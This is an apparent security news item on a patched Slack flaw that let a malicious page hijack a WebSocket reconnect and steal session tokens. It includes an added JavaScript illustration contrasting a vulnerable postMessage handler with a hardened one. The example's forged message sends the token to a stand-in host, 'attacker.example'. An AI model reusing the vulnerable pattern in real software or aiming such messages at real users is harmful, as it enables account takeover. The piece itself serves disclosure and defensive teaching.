Slack has fixed a security flaw that let attackers steal user authentication tokens, giving them full access to the victim's account and messages.
Frans Rosén built a proof-of-concept exploit in which a web page he controlled forced the Slack web client to reconnect one of its WebSocket connections to his own server, letting him capture the user's Slack session token, the credential that keeps the user logged in to the collaborative messaging service.
That token would have given him full access to the user's account, he said in a write-up.
He initially found the bug after realizing that cross-window messages (postMessage) sent from his page could trigger functions in the Slack web client, such as showing browser notifications and switching to other chats. Rosén also found a number of smaller flaws in Slack's calling functionality that let him drop calls and intercept messages.
He said that “none of the events was punchy enough.”
From these pieces the researcher built an exploit that stole tokens outright. When the victim visits the malicious page, the page starts a Slack call, which opens a new WebSocket connection; Rosén then deliberately interrupts that connection and forces it to reconnect to a server he controls, so the client hands its token to the attacker when it reconnects.
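The chain above comes down to two trust decisions inside a web client: which windows it acts on messages from, and where it lets a message point its WebSocket. The following is an added illustration of that pattern and not Slack's code or Rosén's proof of concept; the function names, the app origin app.example-chat.com, the signaling host ws.example-chat.com and the token value are all assumptions, and a single forged ws_reconnect message stands in for the call-triggering sequence described in the article. The vulnerable handler sits beside a hardened one that checks the sender's origin and allowlists the reconnect target.

```javascript
// Added example, not Slack's code: the two trust decisions behind a
// postMessage-to-WebSocket token leak, beside the checks that close them.
// Every name and value here is hypothetical.

const APP_ORIGIN = "https://app.example-chat.com";        // assumed app origin
const ALLOWED_WS_HOSTS = new Set(["ws.example-chat.com"]); // assumed signaling hosts

// Minimal model of the web client: a session token and the WebSocket it
// is connected to. `sent` records every frame so we can see where the
// token went.
function makeClient(token) {
  return { token, wsUrl: "wss://ws.example-chat.com/calls", sent: [] };
}

// Simulated (re)connect: many clients identify themselves on the first
// frame, so whoever owns the endpoint learns the token.
function reconnect(client, url) {
  client.wsUrl = url;
  client.sent.push({ to: url, frame: { type: "hello", token: client.token } });
  return url;
}

// VULNERABLE: acts on a window message from any origin and lets the message
// choose the endpoint to reconnect to.
function handleMessageVulnerable(client, event) {
  const msg = event.data;
  if (msg && msg.type === "ws_reconnect") {
    return reconnect(client, msg.url);
  }
  return null;
}

// HARDENED: only the app's own origin may talk to this handler, and the
// target must parse as a URL, use wss:, and be on the allowlist.
function handleMessageHardened(client, event) {
  if (event.origin !== APP_ORIGIN) return null;            // exact match, not includes()
  const msg = event.data;
  if (!msg || msg.type !== "ws_reconnect") return null;
  let target;
  try {
    target = new URL(msg.url);
  } catch (e) {
    return null;                                           // unparsable URL
  }
  if (target.protocol !== "wss:") return null;             // no plaintext ws:
  if (!ALLOWED_WS_HOSTS.has(target.hostname)) return null; // rejects lookalike hosts too
  return reconnect(client, target.href);
}

// The forged message an attacker's page would post into the client window.
// event.origin is filled in by the browser, so the attacker cannot spoof it.
function attackerEvent() {
  return {
    origin: "https://attacker.example",
    data: { type: "ws_reconnect", url: "wss://attacker.example/collect" },
  };
}

// Token that reached a non-allowlisted host, or null if none did.
function leakedToken(client) {
  const leak = client.sent.find(
    (f) => !ALLOWED_WS_HOSTS.has(new URL(f.to).hostname)
  );
  return leak ? leak.frame.token : null;
}

// Run both handlers against the same forged event and report the outcome.
function demo() {
  const token = "constructed-session-token"; // constructed, not a real token
  const vulnerable = makeClient(token);
  handleMessageVulnerable(vulnerable, attackerEvent());
  const hardened = makeClient(token);
  handleMessageHardened(hardened, attackerEvent());
  return {
    vulnerableLeak: leakedToken(vulnerable), // "constructed-session-token"
    hardenedLeak: leakedToken(hardened),     // null
  };
}

console.log(demo());
```

Run it with node. The origin check is sound because event.origin is supplied by the browser, not by the sending page; compare it with strict equality against an exact origin rather than a substring test. Parsing the reconnect target with URL and matching the hostname against an allowlist also rejects lookalike hosts such as ws.example-chat.com.attacker.example and any downgrade to plaintext ws:.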
Slack fixed the bug within five hours, Rosén said, and the report earned him $3,000 from the company's bug bounty program.
The collaborative messaging company confirmed that the bug had “never been exploited.”
Source: SANS ISC SecNewsFeed @ March 2, 2017 at 08:00AM